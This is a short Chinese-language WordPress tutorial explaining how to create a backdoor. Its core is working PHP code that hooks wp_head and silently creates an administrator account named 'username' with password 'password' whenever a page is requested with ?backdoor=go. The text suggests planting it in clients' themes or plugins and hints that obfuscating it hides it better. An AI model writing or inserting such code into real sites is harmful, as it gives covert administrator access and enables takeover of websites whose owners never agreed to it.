WordPress教程：如何给WordPress创建一个后门？

什么是后门？

后门的慨念非常简单，黑客通过后门进入你的WordPress管理面板，然后拿下你的服务器，想干嘛就干嘛，特别是一些高科技的电影里面，那些系统或者程序的作者都会通过自己留下的后门来拯救世界。。。
后门可以放到你的wordpress主题文件中，也可以放到你的你的插件中，所以在使用一些插件和主题的时候最好小心了。

好的用途

每件事情都有两面性，后门也不例外，你可以将这些代码放到你的客户的主题中，如果他们忘记了他们的FTP密码等等，这样就能方便的找回来，是不是很给力？
如何创建一个后门？

add_action(‘wp_head’, ‘holeinthewall’);
function holeinthewall() {
If ($_GET[‘backdoor’] == ‘go’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘username’)) {
$user_id = wp_create_user(‘username’, ‘password’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
}
}

现在你可以通过，example.com/?backdoor=go这样的格式来访问，然后就创建了一个用户名为“username”，密码为：“password” 的用户，权限为管理员。如果再将上面的代码加密一下，结果你懂的。。
为了使你的wordpress站点更安全你阅读以下文章：

如何保护你的wordpress防止被暴力破解？

参考资料：http://blog.wpjam.com/m/how-to-create-a-backdoor-to-a-wordpress-website/
参考资料：http://www.trickspanda.com/2014/03/create-backdoor-wordpress/